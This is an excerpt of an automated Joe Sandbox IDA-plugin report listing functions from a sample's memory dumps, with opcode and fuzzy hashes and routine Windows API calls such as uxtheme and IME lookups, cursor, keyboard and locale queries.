Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 28e7e119e039b25beda35739a3405b35bb29ee27f4b5ad7a1bbed113ed856bf2
Instruction ID: 8ec50232a3054562826a75f3b7dd9862cffbb809527da770b62680bdd2946c1a
Opcode Fuzzy Hash: 28e7e119e039b25beda35739a3405b35bb29ee27f4b5ad7a1bbed113ed856bf2
Instruction Fuzzy Hash: 24F081B32052046F6749FF6CA8C0D6B77ECEE892A4310406AF90CC7215DB71ED118374

Uniqueness

Uniqueness Score: -1.00%

Function 041759D6 Relevance: 5.1, Strings: 2, Instructions: 2575COMMON

Download Yara Rule

Strings

, xrefs: 04177DFA
c, xrefs: 041778C1

Memory Dump Source

Source File: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID:
String ID: $c
API String ID: 0-3797896886
Opcode ID: 7e70446f2f04736b70a214ab031c3aa6bebdc213c1cd19f391bef6f9c6eef634
Instruction ID: 023369fa3795aa69b4301f3c238452d58a072762ae12abbf9da43dbd6cc2833a
Opcode Fuzzy Hash: 7e70446f2f04736b70a214ab031c3aa6bebdc213c1cd19f391bef6f9c6eef634
Instruction Fuzzy Hash: 4B23EF70A00205AFEB31EF64CCC4BBE77B1AF45704F1485ACE60966291EB74B984DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0415245C Relevance: 4.5, APIs: 3, Instructions: 33synchronizationthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 04152468
GetCursorPos.USER32(?), ref: 04152485
WaitForSingleObject.KERNEL32(00000000,00000064), ref: 041524A5

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CurrentCursorObjectSingleThreadWait
String ID:
API String ID: 1359611202-0
Opcode ID: 31a8cda3c2b0ccd6d00f650d1006013c0880e4862e959f3567dc29ba835bcdc8
Instruction ID: fd2e4febb642840e83c30173e31261cb4a21e4a840a628f7767f31c5ecc2db10
Opcode Fuzzy Hash: 31a8cda3c2b0ccd6d00f650d1006013c0880e4862e959f3567dc29ba835bcdc8
Instruction Fuzzy Hash: 83F08932204208DBFF14FB58E8C5BD973F8DF00754F4041E1D920861E1DB75B894CA11

Uniqueness

Uniqueness Score: -1.00%

Function 0417906B Relevance: 4.2, Strings: 3, Instructions: 464COMMON

Download Yara Rule

Strings

(, xrefs: 041793FE
(((, xrefs: 0417942E
(, xrefs: 0417940F

Memory Dump Source

Source File: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID:
String ID: ($($(((
API String ID: 0-2102698497
Opcode ID: 17cbe7189b4058751cc5e2aaa9f1919b841a36666ba3f5afc1cc8d035a58d977
Instruction ID: 4927768b961d606924cef9cd15dc8579fc3b42c95ebfb5580f46d326077a174e
Opcode Fuzzy Hash: 17cbe7189b4058751cc5e2aaa9f1919b841a36666ba3f5afc1cc8d035a58d977
Instruction Fuzzy Hash: B6E1CF70B04115AFFB08EE29CCC4BBA77B6DF85314F14C269E415EA2D5EB34A9458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0417AACF Relevance: 3.5, Strings: 2, Instructions: 1000COMMON

Download Yara Rule

Strings

, xrefs: 0417B47A
@, xrefs: 0417B892

Memory Dump Source

Source File: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: 062dd7f236da494e309082285e52ea3f476cbb1f75b51689bf49ea5e4b7e8a26
Instruction ID: 9820d3626e84db65f926d9e4de098798054938e48fa8c4ddcefdd644625fe05b
Opcode Fuzzy Hash: 062dd7f236da494e309082285e52ea3f476cbb1f75b51689bf49ea5e4b7e8a26
Instruction Fuzzy Hash: D7722B70648705AAFB26BF64CCC6FBE36B5AF0530CF1440A9FA01A91D2EB747541CAB5

Uniqueness

Uniqueness Score: -1.00%

Function 0413F140 Relevance: 3.1, APIs: 2, Instructions: 97windowCOMMON

Download Yara Rule

APIs

GetMessagePos.USER32 ref: 0413F14F
GetKeyboardState.USER32(?,?,?,?,0413F6C4), ref: 0413F24C

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: KeyboardMessageState
String ID:
API String ID: 3083355189-0
Opcode ID: 9a109fd4098c8cc38e517da96156ca9f784df6a54854a0791d71768ddeba3bee
Instruction ID: 57a4acc72ec372833f94b33211ff283a85f5ff4d94020cbc40ba8db6428df2ad
Opcode Fuzzy Hash: 9a109fd4098c8cc38e517da96156ca9f784df6a54854a0791d71768ddeba3bee
Instruction Fuzzy Hash: A731CD79A08741DAC328DF78C4C27DABBD0EB89315F004A2EE598D3280E774E902C796

Uniqueness

Uniqueness Score: -1.00%

Function 04141018 Relevance: 3.1, APIs: 2, Instructions: 64windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 04141050
GetCapture.USER32 ref: 04141059

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CaptureIconic
String ID:
API String ID: 2277910766-0
Opcode ID: 60cfe2c810b9d5ec0cd76df373e66566d4c20693c2899bd5b26359c5345776a5
Instruction ID: d1bfd1c326a4cc446162755cff075f4288d969720cccd2cb811fffa78c30bb02
Opcode Fuzzy Hash: 60cfe2c810b9d5ec0cd76df373e66566d4c20693c2899bd5b26359c5345776a5
Instruction Fuzzy Hash: 7C112E31B14255ABAB24DF78CAD8A69B3E6AF44304B1444B4E404DF361D775FD809B90

Uniqueness

Uniqueness Score: -1.00%

Function 04123458 Relevance: 3.0, APIs: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,041234F4), ref: 04123478
FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,041234F4), ref: 0412349E

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: abbacc79b7a61aab56fc98ea4248ce74e5eaf07dfa4e02bdba9214a85280f1b1
Instruction ID: 5f07963369ac8c1e33829226f111e617238c6f5c10180dad9ec75b3fc362288d
Opcode Fuzzy Hash: abbacc79b7a61aab56fc98ea4248ce74e5eaf07dfa4e02bdba9214a85280f1b1
Instruction Fuzzy Hash: 7901A77034465D5BF722EBB0CDC1BD972A8EB48704F8180F4AE54D66C0EBF87D908914

Uniqueness

Uniqueness Score: -1.00%

Function 04108F56 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 04108F79

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: 11f38c077d324aaa287c190836f669b7f1f524d5c36f27bf7aed6cf4bc16df02
Instruction ID: f47fe1c83d2b9d07da8ea73a559e04f67c8a83911caf594622a878a5a338d4c8
Opcode Fuzzy Hash: 11f38c077d324aaa287c190836f669b7f1f524d5c36f27bf7aed6cf4bc16df02
Instruction Fuzzy Hash: 311100B5A00209AF9B00CFA9C8809AFB7F9EFC8314B14C569A504E7250E671AA01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0410B8C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0410B8E2

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 2c53b1a2239317bfc178ecae58eec27d8364ed45474992c4285a8de5d7b9ac4e
Instruction ID: 6db5613efc6fc4a0afa2fd04fefd015ac1d3431b18f41d36ae4141920bd7b1eb
Opcode Fuzzy Hash: 2c53b1a2239317bfc178ecae58eec27d8364ed45474992c4285a8de5d7b9ac4e
Instruction Fuzzy Hash: 2EE0D8727142181BE715A5A88CC4AFA725C9758310F00827BBA48C73C5EFE0FD9043E8

Uniqueness

Uniqueness Score: -1.00%

Function 0410B910 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0410D07E,00000000,0410D297,?,?,00000000,00000000), ref: 0410B923

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: b1d6ec197b977121f08516ee7595b6c71277cc4a711715de584c8d8cf224beea
Instruction ID: 9125456b7c04cea678e398b62a69f26138fbd399c9d60b3e6ffa8b84593af789
Opcode Fuzzy Hash: b1d6ec197b977121f08516ee7595b6c71277cc4a711715de584c8d8cf224beea
Instruction Fuzzy Hash: 2ED05EB230E2603AB214919A2DC4E7B5EDCCAC5AA5F01C07AB588C6282D380AC069671

Uniqueness

Uniqueness Score: -1.00%

Function 0410A30C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0410A310

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 40780567ea648be6f000db617f10910e690f96be7393bdb0f4d36b03cf102dc8
Instruction ID: be6b004fe95cb4600ecc1a39d1d3d666930d9f22f9f9e3d3781f0905dd79058f
Opcode Fuzzy Hash: 40780567ea648be6f000db617f10910e690f96be7393bdb0f4d36b03cf102dc8
Instruction Fuzzy Hash: 18A011A080882202AA8033288C0223830C0A800A20FC88B80A8F8802E0EA2E223080AB

Uniqueness

Uniqueness Score: -1.00%

Function 0418BA28 Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

F, xrefs: 0418BAC4

Memory Dump Source

Source File: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: d6ffe21d2d941e64807bf3424b63dbe30d820b4283a3ce816c806b92c1b66454
Instruction ID: 5e48fc60367b24fb154d55e61e87c7a1839bb2f88fd0f5ea52e2f1a616d971ba
Opcode Fuzzy Hash: d6ffe21d2d941e64807bf3424b63dbe30d820b4283a3ce816c806b92c1b66454
Instruction Fuzzy Hash: DC515471F046098BEB18DE5EC8D07AEB6E7ABC8314F54817DE509E7384EB74AE018B44

Uniqueness

Uniqueness Score: -1.00%

Function 0417A1DD Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4cd4ac750aaa4fdc6fa5def1d1338f3c5baa6be6637f6278bb22647abcb1768
Instruction ID: 5f2d741675f5f3e4faae63713bd240272d0f38fc141cb2c7186a97a0a3829376
Opcode Fuzzy Hash: d4cd4ac750aaa4fdc6fa5def1d1338f3c5baa6be6637f6278bb22647abcb1768
Instruction Fuzzy Hash: EAF14071E00219AFEF04AEA9CCC5BEEBBB9EF84314F158058F515B7281DB7469118FA0

Uniqueness

Uniqueness Score: -1.00%

Function 04178D18 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da1b029b2c8cd817535cc31f51fa5df94214df832fd31e041a81918ffc2b5124
Instruction ID: 0b4a86eff77721065ed640801840ea150ef2152efc757085f5f46ea710ed6d8e
Opcode Fuzzy Hash: da1b029b2c8cd817535cc31f51fa5df94214df832fd31e041a81918ffc2b5124
Instruction Fuzzy Hash: 0FA1B231B00515AFEF08EE69CC84BBEB7B7DFC5314F14C169A4159B295EB34A901CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 04102160 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Uniqueness

Uniqueness Score: -1.00%

Function 0412B744 Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 266libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(uxtheme.dll,00000000,0412BAF7), ref: 0412B77A
GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0412B792
GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0412B7A4
GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0412B7B6
GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0412B7C8
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0412B7DA
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0412B7EC
GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0412B7FE
GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0412B810
GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0412B822
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0412B834
GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0412B846
GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0412B858
GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0412B86A
GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0412B87C
GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0412B88E
GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0412B8A0
GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0412B8B2
GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0412B8C4
GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0412B8D6
GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0412B8E8
GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0412B8FA
GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0412B90C
GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0412B91E
GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0412B930
GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0412B942
GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0412B954
GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0412B966
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0412B978
GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0412B98A
GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0412B99C
GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0412B9AE
GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0412B9C0
GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0412B9D2
GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0412B9E4
GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0412B9F6
GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0412BA08
GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0412BA1A
GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0412BA2C
GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0412BA3E
GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0412BA50
GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0412BA62
GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0412BA74
GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0412BA86
GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0412BA98
GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0412BAAA
GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0412BABC
GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0412BACE

Strings

IsAppThemed, xrefs: 0412BA24
GetThemeAppProperties, xrefs: 0412BA6C
EnableTheming, xrefs: 0412BAC6
GetThemeSysColor, xrefs: 0412B994
DrawThemeEdge, xrefs: 0412B850
GetThemeIntList, xrefs: 0412B94C
DrawThemeBackground, xrefs: 0412B7AE
GetThemePropertyOrigin, xrefs: 0412B95E
GetThemeColor, xrefs: 0412B898
CloseThemeData, xrefs: 0412B79C
GetWindowTheme, xrefs: 0412BA36
GetThemeInt, xrefs: 0412B8E0
GetThemeFilename, xrefs: 0412B982
GetThemeFont, xrefs: 0412B916
GetThemeBackgroundRegion, xrefs: 0412B82C
IsThemePartDefined, xrefs: 0412B874
IsThemeBackgroundPartiallyTransparent, xrefs: 0412B886
IsThemeActive, xrefs: 0412BA12
GetThemeString, xrefs: 0412B8BC
GetThemeSysBool, xrefs: 0412B9B8
GetThemeMargins, xrefs: 0412B93A
GetThemeDocumentationProperty, xrefs: 0412BAA2
OpenThemeData, xrefs: 0412B78A
SetWindowTheme, xrefs: 0412B970
GetThemeBool, xrefs: 0412B8CE
GetThemeSysInt, xrefs: 0412BA00
GetThemePosition, xrefs: 0412B904
GetThemeSysColorBrush, xrefs: 0412B9A6
DrawThemeParentBackground, xrefs: 0412BAB4
GetThemeSysFont, xrefs: 0412B9DC
uxtheme.dll, xrefs: 0412B775
GetThemePartSize, xrefs: 0412B7F6
GetThemeTextExtent, xrefs: 0412B808
GetThemeSysSize, xrefs: 0412B9CA
DrawThemeIcon, xrefs: 0412B862
GetThemeEnumValue, xrefs: 0412B8F2
GetThemeBackgroundContentRect, xrefs: 0412B7D2, 0412B7E4
GetCurrentThemeName, xrefs: 0412BA90
GetThemeSysString, xrefs: 0412B9EE
EnableThemeDialogTexture, xrefs: 0412BA48
DrawThemeText, xrefs: 0412B7C0
GetThemeMetric, xrefs: 0412B8AA
GetThemeRect, xrefs: 0412B928
IsThemeDialogTextureEnabled, xrefs: 0412BA5A
HitTestThemeBackground, xrefs: 0412B83E
GetThemeTextMetrics, xrefs: 0412B81A
SetThemeAppProperties, xrefs: 0412BA7E

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
API String ID: 2238633743-2910565190
Opcode ID: f8681eeb9d33afa745261eac7ea0864dc050eb1fd99196d948e98791ef0e8e5e
Instruction ID: f25acba29438ffd9750fef6176dadda78e85c78bb9299cc961682e6f47792983
Opcode Fuzzy Hash: f8681eeb9d33afa745261eac7ea0864dc050eb1fd99196d948e98791ef0e8e5e
Instruction Fuzzy Hash: C9A19FB0B446A0AFEF40EFA6D9C5A6537E8EF067447404565E424CF244DBB8BCA8CF19

Uniqueness

Uniqueness Score: -1.00%

Function 04147028 Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95libraryloaderCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008000), ref: 04147041
GetModuleHandleA.KERNEL32(USER32,00000000,0414718E,?,00008000), ref: 04147065
GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 04147072
LoadLibraryA.KERNEL32(imm32.dll,00000000,0414718E,?,00008000), ref: 0414708E
GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 041470B0
GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 041470C5
GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 041470DA
GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 041470EF
GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 04147104
GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 04147119
GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0414712E
GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 04147143
GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 04147158
GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 0414716D
SetErrorMode.KERNEL32(?,04147195,00008000), ref: 04147188

Strings

ImmSetCompositionFontA, xrefs: 04147123
ImmSetOpenStatus, xrefs: 041470F9
ImmNotifyIME, xrefs: 04147162
ImmGetContext, xrefs: 041470A5
ImmGetCompositionStringA, xrefs: 04147138
ImmIsIME, xrefs: 0414714D
imm32.dll, xrefs: 04147089
WINNLSEnableIME, xrefs: 0414706C
ImmReleaseContext, xrefs: 041470BA
USER32, xrefs: 04147060
ImmGetConversionStatus, xrefs: 041470CF
ImmSetConversionStatus, xrefs: 041470E4
